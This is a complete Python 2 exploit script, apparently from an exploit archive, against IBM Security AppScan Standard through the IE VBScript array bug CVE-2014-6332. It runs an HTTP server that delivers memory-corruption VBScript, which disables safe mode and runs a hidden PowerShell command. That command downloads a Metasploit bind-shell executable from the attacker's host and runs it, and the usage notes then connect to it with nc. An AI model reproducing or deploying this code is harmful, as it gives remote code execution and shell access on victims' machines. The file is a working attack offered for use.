#!/usr/bin/python

import BaseHTTPServer, socket

##
# IBM Security AppScan Standard OLE Automation Array Remote Code Execution
#
# Author: Naser Farhadi
# Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
#
# Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7
#
# Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/ 
# if you able to exploit IE then you can exploit appscan and acunetix ;)
# This Python Script Will Start A Sample HTTP Server On Attacker Machine And Serves Exploit Code And
# Metasploit windows/shell_bind_tcp Executable Payload
#
# Usage:
#       chmod +x appscan.py
#       ./appscan.py
#       ...
#       nc 172.20.10.14 333
#
# Video: http://youtu.be/hPs1zQaBLMU
##

class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    def do_GET(req):
        req.send_response(200)
        if req.path == "/payload.exe":
            req.send_header('Content-type', 'application/exe')
            req.end_headers()
            exe = open("payload.exe", 'rb')
            req.wfile.write(exe.read())
            exe.close()
        else:
            req.send_header('Content-type', 'text/html')
            req.end_headers()
            req.wfile.write("""Please scan me!
                            <SCRIPT LANGUAGE="VBScript">
                            function runmumaa() 
                            On Error Resume Next
                            set shell=createobject("Shell.Application")
                            command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/payload.exe',\
                            'payload.exe');$(New-Object -com Shell.Application).ShellExecute('payload.exe');"
                            shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0
                            end function

                            dim   aa()
                            dim   ab()
                            dim   a0
                            dim   a1
                            dim   a2
                            dim   a3
                            dim   win9x
                            dim   intVersion
                            dim   rnda
                            dim   funclass
                            dim   myarray

                            Begin()

                            function Begin()
                              On Error Resume Next
                              info=Navigator.UserAgent

                              if(instr(info,"Win64")>0)   then
                                 exit   function
                              end if

                              if (instr(info,"MSIE")>0)   then 
                                         intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
                              else
                                 exit   function  
                                         
                              end if

                              win9x=0

                              BeginInit()
                              If Create()=True Then
                                 myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
                                 myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

                                 if(intVersion<4) then
                                     document.write("<br> IE")
                                     document.write(intVersion)
                                     runshellcode()                    
                                 else  
                                      setnotsafemode()
                                 end if
                              end if
                            end function

                            function BeginInit()
                               Randomize()
                               redim aa(5)
                               redim ab(5)
                               a0=13+17*rnd(6)
                               a3=7+3*rnd(5)
                            end function

                            function Create()
                              On Error Resume Next
                              dim i
                              Create=False
                              For i = 0 To 400
                                If Over()=True Then
                                '   document.write(i)     
                                   Create=True
                                   Exit For
                                End If 
                              Next
                            end function

                            sub testaa()
                            end sub

                            function mydata()
                                On Error Resume Next
                                 i=testaa
                                 i=null
                                 redim  Preserve aa(a2)  
                              
                                 ab(0)=0
                                 aa(a1)=i
                                 ab(0)=6.36598737437801E-314

                                 aa(a1+2)=myarray
                                 ab(2)=1.74088534731324E-310  
                                 mydata=aa(a1)
                                 redim  Preserve aa(a0)  
                            end function 


                            function setnotsafemode()
                                On Error Resume Next
                                i=mydata()  
                                i=readmemo(i+8)
                                i=readmemo(i+16)
                                j=readmemo(i+&h134)  
                                for k=0 to &h60 step 4
                                    j=readmemo(i+&h120+k)
                                    if(j=14) then
                                          j=0          
                                          redim  Preserve aa(a2)             
                                 aa(a1+2)(i+&h11c+k)=ab(4)
                                          redim  Preserve aa(a0)  

                                 j=0 
                                          j=readmemo(i+&h120+k)   
                                     
                                           Exit for
                                       end if

                                next 
                                ab(2)=1.69759663316747E-313
                                runmumaa() 
                            end function

                            function Over()
                                On Error Resume Next
                                dim type1,type2,type3
                                Over=False
                                a0=a0+a3
                                a1=a0+2
                                a2=a0+&h8000000
                              
                                redim  Preserve aa(a0) 
                                redim   ab(a0)     
                              
                                redim  Preserve aa(a2)
                              
                                type1=1
                                ab(0)=1.123456789012345678901234567890
                                aa(a0)=10
                                      
                                If(IsObject(aa(a1-1)) = False) Then
                                   if(intVersion<4) then
                                       mem=cint(a0+1)*16             
                                       j=vartype(aa(a1-1))
                                       if((j=mem+4) or (j*8=mem+8)) then
                                          if(vartype(aa(a1-1))<>0)  Then    
                                             If(IsObject(aa(a1)) = False ) Then             
                                               type1=VarType(aa(a1))
                                             end if               
                                          end if
                                       else
                                         redim  Preserve aa(a0)
                                         exit  function

                                       end if 
                                    else
                                       if(vartype(aa(a1-1))<>0)  Then    
                                          If(IsObject(aa(a1)) = False ) Then
                                              type1=VarType(aa(a1))
                                          end if               
                                        end if
                                    end if
                                end if
                                          
                                
                                If(type1=&h2f66) Then         
                                      Over=True      
                                End If  
                                If(type1=&hB9AD) Then
                                      Over=True
                                      win9x=1
                                End If  

                                redim  Preserve aa(a0)          
                                    
                            end function

                            function ReadMemo(add) 
                                On Error Resume Next
                                redim  Preserve aa(a2)  
                              
                                ab(0)=0   
                                aa(a1)=add+4     
                                ab(0)=1.69759663316747E-313       
                                ReadMemo=lenb(aa(a1))  
                               
                                ab(0)=0    
                             
                                redim  Preserve aa(a0)
                            end function

                            </script>""")

if __name__ == '__main__':
    sclass = BaseHTTPServer.HTTPServer
    server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
    print "Http server started", socket.gethostbyname(socket.gethostname()), 80
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        pass
    server.server_close()